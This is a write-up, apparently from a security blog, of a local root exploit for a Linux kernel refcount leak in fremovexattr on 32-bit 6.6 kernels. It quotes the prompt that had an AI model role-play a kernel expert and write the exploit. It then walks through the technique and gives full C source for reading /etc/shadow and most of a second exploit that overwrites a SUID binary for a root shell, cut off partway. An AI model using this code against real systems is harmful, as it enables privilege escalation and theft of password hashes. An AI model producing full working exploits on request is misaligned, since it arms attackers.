Linux Kernel CVE-2024-14027 LPE

The analysis + Exploitation was done using Claude Opus4.6. with A LOT of manual steering regarding the desired exploit path.

On it’s own Claude started by trying to heap-spray and reclaim the object with a pipe_buffer or msg_msg spray. Even with reference exploits for bugs resulting in the same primitive by @_minipli it still had to be instructed about matching the inode/attr of the target file and using fork so we dont crash the entire exploit..

That being said it was able to accomplish the goal with minimal effort on my end besides some steering of what I would do.

The exploits at the end are on github here

The prompt:

there is a kernel vulnerability at this link that is used in a ctf, your name is bradley spengler the grsecurity kernel expert who knows how to     
exploit kernels. it should work on 32bit only and 6.6LTS kernel .. i need you to setup a qemu environment, trigger the bug and then write a full      
exploit which should give access to /etc/shadow or a full /bin/sh shell. you may only use gdb for debugging the crashes and memory/registers but you  
may not use gdb to influence the outcome of the exploitation at all. in the end i want a qemu i can login to and test the exploit. here is the link   
to the vulnerable code https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=a71874379ec8c6e788a61d71b3ad014a8d9a5c08    

The Vulnerability:
“An unprivileged local user can exploit this to cause kernel memory exhaustion.” <— :>

Code Location: fs/xattr.c:952-976 (Linux 6.6.51 i386)

SYSCALL_DEFINE2(fremovexattr, int, fd, const char __user *, name)
{
    struct fd f = fdget(fd);          // slow path: increments f_count
    char kname[XATTR_NAME_MAX + 1];
    int error = -EBADF;

    if (!f.file)
        return error;

    error = strncpy_from_user(kname, name, sizeof(kname));
    if (error == 0 || error == sizeof(kname))
        error = -ERANGE;
    if (error < 0)
        return error;     // BUG: no fdput(f) — leaks one f_count reference

    // ... normal path calls fdput(f) at the end
    fdput(f);
    return error;
}

Root cause: Commit c03185f4a23e refactored removexattr() and moved strncpy_from_user() inline into fremovexattr(), but forgot to add fdput(f) on the early error return (line 966). Each call with an invalid name pointer leaks one refcount on the underlying struct file.

Trigger: Call fremovexattr(fd, 0x1) where 0x1 is an unmapped userspace address. strncpy_from_user() returns -EFAULT, the function returns early without calling fdput(). The fd table must be shared (via clone(CLONE_FILES)) so that fdget() takes the slow path and actually increments f_count.


Exploitation Method 1: /etc/shadow Read (exploit.c)

Concept

Overflow f_count to wrap it to 0, then free the struct file via normal close operations. The freed slab slot is reclaimed by a SUID process (passwd -S) that opens /etc/shadow. A dangling fd in the exploit process now points to the /etc/shadow struct file — read it.

Step-by-step

Phase 1: Setup — pipes first, then target file

pipe() x4              → 8 struct files allocated from filp slab cache
open("/tmp/target")    → target struct file on CURRENT cpu_slab page
dup(target_fd)         → f_count = 2 (target_fd + dangling_fd)

Why pipes first: SLUB allocates from per-CPU freelists. By allocating pipe files first, the target file lands on whatever page is current after those allocations. No more filp allocs happen until the target is freed, so the cpu_slab stays the same → the freed slot goes to the per-CPU freelist → the next filp alloc (by passwd) reclaims it.

Phase 2: Shared fd table for slow-path fdget

clone(CLONE_VM | CLONE_FILES) → idle child shares fd table

Why: fdget() checks atomic_long_read(&files->count). If count > 1 (shared fd table), it takes the slow path: atomic_long_inc_not_zero(&file->f_count). If count == 1, it takes the fast path: just reads the pointer without touching f_count. We need the slow path during overflow so each fremovexattr actually increments f_count.

Phase 3: Refcount overflow

3 worker threads (clone CLONE_VM | CLONE_FILES):
  tight loop: fremovexattr(target_fd, 0x1) → each call leaks +1 to f_count

Starting f_count: 2
Target leaks: 0xFFFFFFFE (4,294,967,294)
Final f_count: 2 + 0xFFFFFFFE = 0x100000000 = 0 (mod 2^32)

Arithmetic: atomic_long_t on i386 is 32 bits. atomic_long_inc wraps at 2^32. After 0xFFFFFFFE leaks, f_count is exactly 0. This wrap happens via increment, not via dec_and_test, so __fput is never triggered — the struct file stays allocated but with f_count=0.

Performance: ~3.7-4.7M leaks/sec with 3 workers on KVM. Total time: ~22 minutes.

Bulk + precise finish: Workers run until within 10M of target, then stop. Main thread does remaining leaks single-threaded for precise count. If workers overshoot, a fixup loop wraps around again.

Phase 4: Enable fast-path fdget

kill(idle_child)  → files->count drops to 1

Why: With f_count=0, any future fdget() on this fd matters:

  • Slow path (files->count > 1): calls atomic_long_inc_not_zero(f_count). f_count=0 → returns NULL → EBADF. We can’t use the fd at all.
  • Fast path (files->count == 1): just reads fd_table[fd] directly without touching f_count. This lets us access the struct file even though f_count=0.

Killing the idle child drops files->count from 2 to 1, enabling fast-path fdget for all subsequent fd operations.

Phase 5: Fork spawner and closer BEFORE free

fork() → spawner child (inherits target_fd + dangling_fd)
fork() → closer child (inherits target_fd + dangling_fd)

Critical detail: fork() calls dup_fd()get_file() on every inherited fd. get_file() does atomic_long_inc() — this is unconditional (not inc_not_zero). So fork bumps f_count from 0 to +2 per fork (once for target_fd, once for dangling_fd).

After 2 forks: f_count = 0 + 2 + 2 = 4

Phase 6: Free the struct file

closer child:  close(target_fd) → f_count 4→3
               close(dangling_fd) → f_count 3→2
parent:        close(target_fd) → f_count 2→1
spawner child: close(target_fd) → f_count 1→0 → dec_and_test SUCCEEDS → __fput → FREED
               close(dangling_fd) → another dec_and_test on freed slab (harmless)

Key: The spawner’s close of target_fd does dec_and_test(1→0) = true → __fput() is called → struct file is freed via RCU callback → slab slot returns to SLUB freelist.

The parent keeps dangling_fd open. With fast-path fdget (files->count=1), any operation on dangling_fd reads the raw pointer from the fd table — pointing to freed/reused slab memory.

Phase 7: Spray via passwd -S

spawner child: continuous fork+execve("/usr/bin/passwd", "-S")
               each passwd opens /etc/shadow O_RDONLY → struct file allocated from filp slab

passwd -S is SUID root. When it runs, it opens /etc/shadow as root. The struct file for /etc/shadow is allocated from the same filp slab cache as the freed target — and lands in the freed slot (same CPU, same page, per-CPU freelist reuse).

Phase 8: Sacrificial child monitoring

for (;;) {
    child = fork();
    if (child == 0) {
        // In sacrificial child:
        flags = fcntl(dangling_fd, F_GETFL);  // fast-path: reads stale fd pointer
        if (flags == O_RDONLY) {               // shadow opened O_RDONLY
            fstat(dangling_fd, &sb);
            if (sb.st_dev == shadow_dev && sb.st_ino == shadow_ino) {
                pread(dangling_fd, buf, 64K, 0);  // READ /etc/shadow!
                write to /tmp/shadow_dump
                _exit(0);  // SUCCESS
            }
        }
    }
    waitpid(child);  // if child crashed (kernel oops), parent retries
}

Sacrificial child pattern (from CVE-2022-22942): The stale fd points to freed/reused slab memory. Operations on it may trigger kernel NULL dereferences (e.g., f_path.mnt is garbage, path_init dereferences it). If the child oopses, only the child dies — parent survives and forks another.

dev/ino match: Before the exploit, we stat("/etc/shadow") to get the device and inode. The child’s fstat() on the stale fd compares against these to confirm it’s truly /etc/shadow (not /etc/passwd or something else the SUID process opened).

Result: Parent receives child’s exit(0) → success. /etc/shadow contents (yescrypt password hashes) printed to stdout and saved to /tmp/shadow_dump.


Exploitation Method 2: SUID Binary Overwrite → Root Shell (exploit_dc.c)

Concept

Same refcount overflow, but instead of reading a privileged file, we use a double-close technique to overwrite a SUID root binary (/usr/bin/chfn) with our own code, then exec it for a root shell.

The double-close technique chains two UAFs: first to create a writable mmap, then to redirect that mmap’s backing file to a SUID binary.

Step-by-step

Phases 1-4: Identical to exploit.c

Pipes first → open target → clone idle child → overflow f_count to 0 → kill idle child for fast-path fdget.

Phase 5: Free the struct file via fork helper

This is where exploit_dc.c differs from exploit.c. After overflow, f_count=0.

The problem: Simply calling close(target_fd) does dec_and_test(0). But dec_and_test on atomic_long_t does: decrement to 0xFFFFFFFF, then test if result is 0. 0xFFFFFFFF ≠ 0, so __fput is never called. The struct file is never freed.

The fix: Fork a helper child:

pid_t free_pid = fork();
if (free_pid == 0) {
    close(target_fd);     // f_count 2→1 (dec_and_test: 1≠0)
    close(dangling_fd);   // f_count 1→0 (dec_and_test: 0=0 → __fput → FREED!)
    _exit(0);
}
waitpid(free_pid, NULL, 0);
close(target_fd);  // parent cleanup (harmless fput on freed memory)

fork() calls get_file() with atomic_long_inc (unconditional) on every inherited fd. With f_count=0:

  • target_fd: 0 → 1
  • dangling_fd: 0 → 1 (same underlying struct file, so actually 1 → 2)
  • Net: f_count = 0 + 2 = 2

Child closes both → dec_and_test(2→1) no, dec_and_test(1→0) yes → __fput() → struct file freed via RCU.

Parent still has dangling_fd open. With fast-path fdget (files->count=1), it can access the freed slab slot.

Phase 6: Spray temp files to reclaim the slot

for (i = 0; i < 256; i++) {
    temp_fds[i] = open("/var/tmp/.xtmp_N", O_RDWR | O_CREAT | O_TRUNC, 0600);
    unlink(path);
    ftruncate(temp_fds[i], prog_size);
}

256 temp files opened O_RDWR. Each open() allocates a struct file from the filp slab cache. One of them reclaims the freed slot. The dangling_fd now points to a temp file’s struct file.

Phase 7: Identify which temp file reclaimed the slot

flags = fcntl(dangling_fd, F_GETFL);     // fast-path: reads through stale pointer
fstat(dangling_fd, &stale_sb);           // get inode of whatever's in the slot
for (i = 0; i < 256; i++) {
    fstat(temp_fds[i], &sb);
    if (sb.st_ino == stale_sb.st_ino && sb.st_dev == stale_sb.st_dev) {
        match_fd = temp_fds[i];          // FOUND IT
        break;
    }
}

Retry loop: If the slot was taken by a kernel-internal file (not our temp file), close everything, wait 200ms, and spray again. Up to 20 retries with readlink(/proc/self/fd/N) diagnostics.

Phase 8: Create writable mmap (but DON’T touch it yet)

void *mmap_addr = mmap(NULL, prog_size, PROT_READ | PROT_WRITE,
                        MAP_SHARED, match_fd, 0);
// Close ALL temp fds — mmap holds the last reference
for (i = 0; i < 256; i++) close(temp_fds[i]);

Critical: mmap() checks PROT_WRITE against match_fd’s file mode (O_RDWR) — this check passes because it’s our temp file. The kernel creates a VMA with vm_file pointing to the temp file’s struct file. vm_file holds a reference (f_count=1 after closing all temp fds).

Lazy pages: We don’t touch the mapping yet. Page faults are resolved lazily, via vm_file->f_mapping. We want the faults to happen after we swap the struct file underneath.

Phase 9: Double close (second free)

close(dangling_fd);  // fput on temp file's struct file
                     // f_count was 1 (only mmap ref) → 0 → __fput → FREED AGAIN
usleep(200000);      // RCU grace period

This is the double close. dangling_fd still points to the same struct file as match_fd (the temp file). Closing it calls fput()dec_and_test(1→0)__fput() → struct file freed via RCU.

The mmap’s VMA still has vm_file pointing to the now-freed struct file. This is the second dangling reference.

Phase 10: Reallocate with SUID target

for (i = 0; i < 256; i++)
    suid_fds[i] = open("/usr/bin/chfn", O_RDONLY);

256 opens of the SUID binary. One of them reclaims the freed slab slot. The mmap’s vm_file now points to /usr/bin/chfn’s struct file. Specifically, vm_file->f_mapping now points to chfn’s inode address_space.

Phase 11: Overwrite via mmap

memcpy(mmap_addr, prog_addr, prog_size);

memcpy triggers page faults on the mmap. The kernel resolves each fault via:

  1. vma->vm_file → points to chfn’s struct file (swapped!)
  2. file->f_mapping → chfn’s inode address_space
  3. Page cache lookup in chfn’s address_space
  4. Write lands in chfn’s page cache → overwrites /usr/bin/chfn on disk

Key insight: The PROT_WRITE check was done at mmap() time against the temp file (O_RDWR). The kernel doesn’t re-verify write permission when the struct file underneath changes to an O_RDONLY file. The VMA flags say “writable” and that’s what the page fault handler honors.

Phase 12: Exec for root shell

// exploit_dc.c starts with:
if (!geteuid()) {
    setuid(0); setgid(0);
    execve("/bin/sh", ...);
}

// After overwrite:
execve("/usr/bin/chfn", ...);  // chfn is now our binary, SUID root → euid=0 → /bin/sh

The overwritten chfn is our exploit binary. When exec’d, it’s SUID root, so geteuid() == 0. The entry check triggers: setuid(0), setgid(0), execve("/bin/sh")root shell.

Phase 13: Become a ghost

setsid();
close(0); close(1); close(2);
sigfillset(&set); sigprocmask(SIG_BLOCK, &set, NULL);
for (;;) pause();

The mmap still holds a dangling vm_file. If the process exits, the VFS tries to clean up and hits f_count=0 → kernel warning “VFS: Close: file count is 0” or worse, an oops. So the process daemonizes and sleeps forever to avoid triggering cleanup.

exploit.c

/*
 * CVE-2024-14027 Exploit
 * fremovexattr fdput leak → refcount overflow → UAF → same-type object reuse
 * Target: Linux 6.6.51 i386 (QEMU, no SMEP/SMAP, no KASLR)
 *
 * Strategy:
 *   1. Create all pipes FIRST (so their struct files don't pollute cpu_slab)
 *   2. Open target file, dup → f_count = 2 (on current cpu_slab)
 *   3. clone(CLONE_FILES) for fdget slow path during overflow
 *   4. Overflow f_count via fremovexattr bug
 *   5. Fork spawner/closer BEFORE free (no new struct file allocs)
 *   6. Free via closer+parent+spawner close sequence
 *   7. Freed struct file stays on cpu_slab per-cpu freelist (key fix!)
 *   8. passwd spray churns slab → /etc/shadow lands in freed slot
 *   9. Sacrificial child checks stale fd via stat/inode match → reads shadow
 *
 * Monitoring pattern from CVE-2022-22942 (minipli):
 *   - stat() victim file to get dev/ino before exploit
 *   - Fork sacrificial child to probe stale fd (handles kernel oopses)
 *   - Child uses fcntl(F_GETFL) + fstat() + dev/ino compare
 *   - Parent survives oopses, retries with new child
 *
 * Compile: gcc -m32 -static -O2 -o exploit exploit.c
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <sys/sysmacros.h>

#define TARGET_LEAKS    0xFFFFFFFEUL
#define SLACK           10000000UL

#define NUM_WORKERS     3
#define STACK_SIZE      (64 * 1024)

#define VICTIM_FILE     "/etc/shadow"
#define VICTIM_HELPER   "/usr/bin/passwd"
#define NUM_PROCS       10

extern char **environ;

static volatile unsigned long leak_count;
static volatile int go;
static volatile int stop_workers;
static int target_fd;
static int dangling_fd;

static dev_t victim_dev;
static ino_t victim_ino;

static inline long fast_fremovexattr(int fd, const void *name)
{
    long ret;
    __asm__ volatile("int $0x80"
                     : "=a"(ret)
                     : "a"(237), "b"(fd), "c"(name)
                     : "memory");
    return ret;
}

/* ------------------------------------------------------------------ */
/* Leak worker: tight fremovexattr loop                                */
/* ------------------------------------------------------------------ */
static int leak_worker(void *arg)
{
    unsigned long local = 0;
    int fd = target_fd;
    (void)arg;

    cpu_set_t all;
    CPU_ZERO(&all);
    for (int i = 0; i < 4; i++) CPU_SET(i, &all);
    sched_setaffinity(0, sizeof(all), &all);

    while (!go)
        __asm__ volatile("pause");

    while (!stop_workers) {
        fast_fremovexattr(fd, (const void *)0x1UL);
        local++;
        if ((local & 0xFFFFF) == 0)
            __sync_fetch_and_add(&leak_count, 0x100000);
    }

    __sync_fetch_and_add(&leak_count, local & 0xFFFFF);
    _exit(0);
    return 0;
}

/* ------------------------------------------------------------------ */
/* idle_fn: keeps fd table shared so fdget takes slow path             */
/* ------------------------------------------------------------------ */
static int idle_fn(void *arg)
{
    (void)arg;
    for (;;) pause();
    return 0;
}

/* ------------------------------------------------------------------ */
/* fd_closer: forked BEFORE free, closes inherited fds to trigger free */
/* ------------------------------------------------------------------ */
static void fd_closer(int ready_fd)
{
    if (prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0) < 0)
        _exit(1);

    close(target_fd);
    close(dangling_fd);

    write(ready_fd, "R", 1);
    close(ready_fd);

    for (;;) pause();
}

/* ------------------------------------------------------------------ */
/* passwd_spawner: continuously fork+exec "passwd -S" as root          */
/* ------------------------------------------------------------------ */
static void passwd_spawner(int pipe_rd, int pipe_wr, int freed_wr)
{
    char *argv[] = { VICTIM_HELPER, "-S", NULL };
    int procs = 0;
    char ch;

    if (prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0) < 0)
        _exit(1);

    /* Signal ready */
    if (write(pipe_wr, "1", 1) <= 0)
        _exit(1);

    /* Wait for "go" signal */
    if (read(pipe_rd, &ch, sizeof(ch)) <= 0)
        _exit(1);

    /* Close our refs to the target file → triggers __fput → slab freed */
    close(target_fd);
    close(dangling_fd);

    /* Signal parent that we've freed the struct file */
    write(freed_wr, "F", 1);
    close(freed_wr);

    /* Close stdio to minimize noise */
    close(0); close(1); close(2);

    for (;;) {
        switch (fork()) {
            case -1:
                usleep(1);
                break;
            case 0:
                execve(VICTIM_HELPER, argv, environ);
                _exit(1);
            default:
                procs++;
        }

        if (procs >= NUM_PROCS) {
            if (wait(NULL) > 0)
                procs--;
            while (waitpid(-1, NULL, WNOHANG) > 0)
                procs--;
        }
    }
}

/* ------------------------------------------------------------------ */
/* check_fd: runs in sacrificial child, checks if stale fd is shadow   */
/* ------------------------------------------------------------------ */
static void check_fd(void)
{
    const int shadow_flags = O_RDONLY;
    char buf[64 * 1024];
    struct stat sb;
    int flags;

    for (;;) {
        usleep(1);

        /* passwd opens /etc/shadow with O_RDONLY */
        flags = fcntl(dangling_fd, F_GETFL);
        if (flags < 0 || (flags & O_ACCMODE) != shadow_flags)
            continue;

        if (fstat(dangling_fd, &sb) != 0)
            continue;

        if (sb.st_dev == victim_dev && sb.st_ino == victim_ino) {
            ssize_t cnt = pread(dangling_fd, buf, sizeof(buf) - 1, 0);

            if (cnt > 0) {
                buf[cnt] = '\0';
                /* Write to file first (survives kernel log noise) */
                int out = open("/tmp/shadow_dump", O_WRONLY | O_CREAT | O_TRUNC, 0600);
                if (out >= 0) {
                    write(out, buf, cnt);
                    close(out);
                }
                printf("\n\n========================================\n");
                printf(" SUCCESS! Read %s via stale fd %d (%zd bytes)\n",
                       VICTIM_FILE, dangling_fd, cnt);
                printf("========================================\n\n");
                printf("%s\n", buf);
                printf("\n[+] Shadow data also saved to /tmp/shadow_dump\n");
                _exit(0);
            }
        }
    }
}

/* ------------------------------------------------------------------ */
/* Main                                                                */
/* ------------------------------------------------------------------ */
int main(void)
{
    pid_t worker_pids[NUM_WORKERS];
    pid_t idle_child;

    setbuf(stdout, NULL);

    printf("[*] CVE-2024-14027 exploit — PID %d\n", getpid());
    printf("[*] Strategy: refcount overflow → UAF → slab reuse polling\n");
    printf("[*] SLUB fix: pipes before target → freed slot stays on cpu_slab\n\n");

    /* Verify SUID helper exists */
    struct stat st;
    if (stat(VICTIM_HELPER, &st) != 0) {
        printf("[!] %s not found\n", VICTIM_HELPER);
        return 1;
    }
    if (!(st.st_uid == 0 && (st.st_mode & 04111) == 04111)) {
        printf("[!] %s is not SUID root (uid=%d mode=%o)\n",
               VICTIM_HELPER, st.st_uid, st.st_mode);
        return 1;
    }
    printf("[+] %s is SUID root\n", VICTIM_HELPER);

    /* Gather stat info for victim file (dev/ino for check_fd match) */
    {
        struct stat vsb;
        if (stat(VICTIM_FILE, &vsb) < 0) {
            perror("[!] stat(" VICTIM_FILE ")");
            return 1;
        }
        victim_dev = vsb.st_dev;
        victim_ino = vsb.st_ino;
        printf("[+] %s: dev=(%d,%d) ino=%lu\n", VICTIM_FILE,
               major(victim_dev), minor(victim_dev), (unsigned long)victim_ino);
    }

    /* Pin to CPU 0 for consistent SLUB cpu_slab */
    cpu_set_t cpu0;
    CPU_ZERO(&cpu0);
    CPU_SET(0, &cpu0);
    sched_setaffinity(0, sizeof(cpu0), &cpu0);

    /* ---- Phase 1: Create ALL pipes FIRST ----
     * These allocate struct files from the filp slab cache.
     * By doing this BEFORE opening the target file, the target's
     * struct file will be allocated on whatever cpu_slab page is
     * current AFTER these allocations. Then no more filp allocs
     * happen until the target is freed, so the cpu_slab stays put. */
    int spawn_pipes[2][2];
    int closer_pipe[2];
    int freed_pipe[2];

    if (pipe(spawn_pipes[0]) < 0 || pipe(spawn_pipes[1]) < 0 ||
        pipe(closer_pipe) < 0 || pipe(freed_pipe) < 0) {
        perror("[!] pipe");
        return 1;
    }
    printf("[+] All pipes created (8 struct files allocated from filp cache)\n");

    /* ---- Phase 2: Open target file ----
     * This struct file goes on the CURRENT cpu_slab.
     * No more filp allocs will happen until this is freed. */
    target_fd = open("/tmp/exploit_target", O_RDWR | O_CREAT | O_TRUNC, 0666);
    if (target_fd < 0) { perror("[!] open"); return 1; }

    dangling_fd = dup(target_fd);
    if (dangling_fd < 0) { perror("[!] dup"); return 1; }

    printf("[+] target_fd=%d  dangling_fd=%d  (f_count=2)\n", target_fd, dangling_fd);

    /* Clone idle child for fdget slow path during overflow */
    {
        void *stack = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (stack == MAP_FAILED) { perror("[!] mmap"); return 1; }
        idle_child = clone(idle_fn, (char *)stack + STACK_SIZE,
                           CLONE_VM | CLONE_FILES | SIGCHLD, NULL);
        if (idle_child < 0) { perror("[!] clone idle"); return 1; }
    }

    /* ---- Phase 3: Overflow f_count ---- */
    int fast_mode = (access("/tmp/fast_mode", F_OK) == 0);

    if (fast_mode) {
        printf("[*] FAST MODE enabled (/tmp/fast_mode exists)\n");
        printf("[*] Doing 100 leaks to verify bug...\n");
        for (int i = 0; i < 100; i++)
            fast_fremovexattr(target_fd, (const void *)0x1UL);
        printf("[*] f_count should be 102 now.\n");
        printf("[*] Calling sync() — GDB: break __do_sys_sync, set f_count = 1\n");
        fflush(NULL);
        sync();
        printf("[*] Continuing after GDB intervention...\n");
    } else {
        printf("[*] Spawning %d leak workers...\n", NUM_WORKERS);
        for (int i = 0; i < NUM_WORKERS; i++) {
            void *stack = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE,
                               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
            if (stack == MAP_FAILED) { perror("[!] mmap"); return 1; }
            worker_pids[i] = clone(leak_worker, (char *)stack + STACK_SIZE,
                                   CLONE_VM | CLONE_FILES | SIGCHLD, NULL);
            if (worker_pids[i] < 0) { perror("[!] clone worker"); return 1; }
        }

        unsigned long target_bulk = TARGET_LEAKS - SLACK;
        printf("[*] Starting overflow: need %lu leaks (%.2fG)\n",
               TARGET_LEAKS, TARGET_LEAKS / 1e9);

        go = 1;
        __sync_synchronize();

        unsigned long last = 0;
        while (leak_count < target_bulk) {
            usleep(2000000);
            unsigned long cur = leak_count;
            double pct = 100.0 * cur / TARGET_LEAKS;
            double rate = (cur - last) / 2.0 / 1e6;
            unsigned long remaining = TARGET_LEAKS - cur;
            double eta = (rate > 0) ? remaining / (rate * 1e6) : 9999;
            printf("\r[*] %luM / 4294M (%.1f%%)  %.1fM/s  ETA %.0fs   ",
                   cur / 1000000, pct, rate, eta);
            last = cur;
        }

        stop_workers = 1;
        __sync_synchronize();

        for (int i = 0; i < NUM_WORKERS; i++)
            waitpid(worker_pids[i], NULL, 0);

        unsigned long done = leak_count;
        printf("\n[*] Workers done: %lu leaks.\n", done);

        if (done < TARGET_LEAKS) {
            unsigned long remain = TARGET_LEAKS - done;
            printf("[*] Finishing remaining %lu precisely...\n", remain);
            for (unsigned long i = 0; i < remain; i++) {
                fast_fremovexattr(target_fd, (const void *)0x1UL);
                if ((i & 0xFFFFF) == 0 && i > 0)
                    printf("\r[*] precise: %luM / %luM   ", i / 1000000, remain / 1000000);
            }
            printf("\r[*] Precise finish done (%luM leaks)   \n", remain / 1000000);
        } else {
            unsigned long extra = done - TARGET_LEAKS;
            unsigned long fixup = (0x100000000UL - extra) & 0xFFFFFFFFUL;
            printf("[*] Workers overshot by %lu, doing %lu fixup leaks...\n", extra, fixup);
            for (unsigned long i = 0; i < fixup; i++)
                fast_fremovexattr(target_fd, (const void *)0x1UL);
        }
    }

    /* Kill idle child → files->count drops to 1 → fast-path fdget */
    kill(idle_child, SIGKILL);
    waitpid(idle_child, NULL, 0);
    printf("[*] Idle child reaped → fast-path fdget (files->count=1)\n");
    printf("[+] %s complete. Proceeding to free + spray + poll\n",
           fast_mode ? "GDB fast-forward" : "Overflow");

    /* Phase 4: Fork spawner and closer BEFORE the free */
    printf("[*] Forking passwd_spawner...\n");
    pid_t spawner_pid = fork();
    if (spawner_pid == 0) {
        close(spawn_pipes[0][1]);
        close(spawn_pipes[1][0]);
        close(closer_pipe[0]);
        close(closer_pipe[1]);
        close(freed_pipe[0]);
        passwd_spawner(spawn_pipes[0][0], spawn_pipes[1][1], freed_pipe[1]);
        _exit(0);
    }
    if (spawner_pid < 0) { perror("[!] fork spawner"); return 1; }

    /* Parent: close spawner's pipe ends */
    close(spawn_pipes[0][0]);
    close(spawn_pipes[1][1]);
    close(freed_pipe[1]);

    /* Wait for spawner ready */
    char ch;
    if (read(spawn_pipes[1][0], &ch, 1) != 1) {
        printf("[!] spawner failed to signal ready\n");
        kill(spawner_pid, SIGKILL);
        return 1;
    }
    close(spawn_pipes[1][0]);
    printf("[+] passwd_spawner ready (PID %d)\n", spawner_pid);

    /* Fork fd_closer */
    pid_t closer_pid = fork();
    if (closer_pid == 0) {
        close(closer_pipe[0]);
        close(spawn_pipes[0][1]);
        close(freed_pipe[0]);
        fd_closer(closer_pipe[1]);
        _exit(0);
    }
    if (closer_pid < 0) { perror("[!] fork closer"); return 1; }

    close(closer_pipe[1]);

    /* Wait for closer to finish closing its inherited fds */
    char ready;
    if (read(closer_pipe[0], &ready, 1) != 1) {
        printf("[!] fd_closer failed to signal ready\n");
        kill(closer_pid, SIGKILL);
        return 1;
    }
    close(closer_pipe[0]);

    /* Parent closes target_fd (keeps dangling_fd for polling) */
    close(target_fd);
    printf("[+] fd_closer done, parent target_fd closed.\n");

    /* Signal spawner to go (it will close its fds → trigger free → start spray) */
    printf("[*] Signaling spawner: close fds → free struct file → start spray\n");
    write(spawn_pipes[0][1], "G", 1);
    close(spawn_pipes[0][1]);

    /* Wait for spawner to confirm struct file is freed */
    char freed_ch;
    if (read(freed_pipe[0], &freed_ch, 1) != 1) {
        printf("[!] WARNING: spawner didn't signal freed (may still work)\n");
    }
    close(freed_pipe[0]);
    printf("[+] Struct file freed! Spawner starting passwd spray on CPU 0\n");

    /* Phase 5: Monitor stale fd in sacrificial subprocess
     *
     * Pattern from CVE-2022-22942: fork a child to probe the stale fd.
     * If the child oopses (kernel NULL deref on stale pointers), only
     * the child dies — parent survives and forks another.
     * Child uses fcntl(F_GETFL) + fstat() to match against /etc/shadow
     * dev/ino before attempting to read. */
    printf("[*] Monitoring stale fd %d...", dangling_fd);
    fflush(NULL);
    for (;;) {
        pid_t pid = fork();
        int status;

        switch (pid) {
            case  0: check_fd(); /* never returns on success (_exit(0)) */
            case -1: usleep(10);
                     continue;
        }

        if (waitpid(pid, &status, 0) < 0)
            continue;

        if (WIFEXITED(status) && WEXITSTATUS(status) == 0) {
            /* Child found and printed /etc/shadow */
            kill(spawner_pid, SIGKILL);
            kill(closer_pid, SIGKILL);
            while (waitpid(-1, NULL, WNOHANG) > 0);
            return 0;
        }

        putchar('+');
        fflush(NULL);
    }
}

exploit_dc.c

/*
 * exploit_dc.c — CVE-2024-14027 → root shell via SUID binary overwrite
 *
 * Double-close technique adapted from CVE-2022-22942-dc.c (minipli).
 *
 * Strategy:
 *   1. Overflow f_count via fremovexattr → free struct file (dangling_fd stale)
 *   2. Open temp files O_RDWR → one reallocates the freed slab
 *   3. Identify match via stale fd (fcntl + fstat inode compare)
 *   4. mmap the match (PROT_WRITE, MAP_SHARED) — lazy, no pages faulted
 *   5. Close all temp fds + close(dangling_fd) → extra fput → struct file freed again
 *   6. Open SUID target O_RDONLY → reallocate slab with SUID's struct file
 *   7. memcpy through mmap → page faults go to SUID's page cache → overwrites it
 *   8. exec overwritten SUID → root shell
 *
 * When executed as the overwritten SUID binary (euid==0), spawns /bin/sh.
 *
 * Compile: gcc -m32 -O2 -o exploit_dc exploit_dc.c
 *          (dynamic link — binary must fit inside the SUID target)
 *
 * Run:     ./exploit_dc [suid_target]   (default: /usr/bin/chfn)
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/sysmacros.h>

#define TARGET_LEAKS    0xFFFFFFFEUL
#define SLACK           10000000UL
#define NUM_WORKERS     3
#define STACK_SIZE      (64 * 1024)
#define NUM_SPRAY       256
#define MAX_DC_RETRIES  20
#define SUID_TARGET     "/usr/bin/chfn"
#define TEMP_PREFIX     "/var/tmp/.xtmp"

static volatile unsigned long leak_count;
static volatile int go;
static volatile int stop_workers;
static int target_fd;
static int dangling_fd;

/* ------------------------------------------------------------------ */
/* fremovexattr via int 0x80                                           */
/* ------------------------------------------------------------------ */
static inline long fast_fremovexattr(int fd, const void *name)
{
    long ret;
    __asm__ volatile("int $0x80"
                     : "=a"(ret)
                     : "a"(237), "b"(fd), "c"(name)
                     : "memory");
    return ret;
}

/* ------------------------------------------------------------------ */
/* Leak worker                                                         */
/* ------------------------------------------------------------------ */
static int leak_worker(void *arg)
{
    unsigned long local = 0;
    int fd = target_fd;
    (void)arg;

    cpu_set_t all;
    CPU_ZERO(&all);
    for (int i = 0; i < 4; i++) CPU_SET(i, &all);
    sched_setaffinity(0, sizeof(all), &all);

    while (!go)
        __asm__ volatile("pause");

    while (!stop_workers) {
        fast_fremovexattr(fd, (const void *)0x1UL);
        local++;
        if ((local & 0xFFFFF) == 0)
            __sync_fetch_and_add(&leak_count, 0x100000);
    }

    __sync_fetch_and_add(&leak_count, local & 0xFFFFF);
    _exit(0);
    return 0;
}

/* ------------------------------------------------------------------ */
/* Idle child for fdget slow-path during overflow                      */
/* ------------------------------------------------------------------ */
static int idle_fn(void *arg)
{
    (void)arg;
    for (;;) pause();
    return 0;
}

/* ------------------------------------------------------------------ */
/* Map a file read-only and pre-fault all pages                        */
/* ------------------------------------------------------------------ */
static void *map_file(const char *path, size_t *len)
{
    struct stat sb;
    int fd;

    fd = open(path, O_RDONLY);
    if (fd < 0) { perror(path); _exit(1); }
    if (fstat(fd, &sb)) { perror("fstat"); _exit(1); }
    *len = sb.st_size;

    void *addr = mmap(NULL, *len, PROT_READ, MAP_SHARED, fd, 0);
    if (addr == MAP_FAILED) { perror("mmap"); _exit(1); }

    /* Pre-fault to avoid page-ins during the critical path */
    for (size_t i = 0; i < *len; i += 4096)
